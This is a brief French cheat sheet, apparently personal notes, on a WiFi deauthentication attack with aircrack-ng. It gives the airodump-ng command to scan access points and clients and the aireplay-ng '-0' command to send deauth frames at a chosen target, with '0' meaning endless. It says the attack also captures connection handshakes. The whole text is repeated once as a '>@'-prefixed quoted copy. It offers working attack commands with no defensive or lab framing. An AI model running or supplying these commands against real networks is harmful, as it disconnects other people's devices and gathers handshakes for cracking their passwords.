
On envoie une demande (non valide) de deconnexion d'un réseau wifi.
Permet également de capturer les handshakes de connexion.

$ sudo airodump-ng wlan0 
On verifie les réseaux, points d'accès et machines.

$ sudo aireplay-ng -0 <nb> -a <access point MAC> -c <target MAC> <interface) 
>>> -0:		attaque par deauth.
>>> <nb>:	nb de deauthentification. 0 = infini

>@
>@################################################################################
>@
>@On envoie une demande (non valide) de deconnexion d'un réseau wifi.
>@Permet également de capturer les handshakes de connexion.
>@
>@$ sudo airodump-ng wlan0 
>@On verifie les réseaux, points d'accès et machines.
>@
>@$ sudo aireplay-ng -0 <nb> -a <access point MAC> -c <target MAC> <interface) 
>@>>> -0:		attaque par deauth.
>@>>> <nb>:	nb de deauthentification. 0 = infini
>@
>@################################################################################
>@
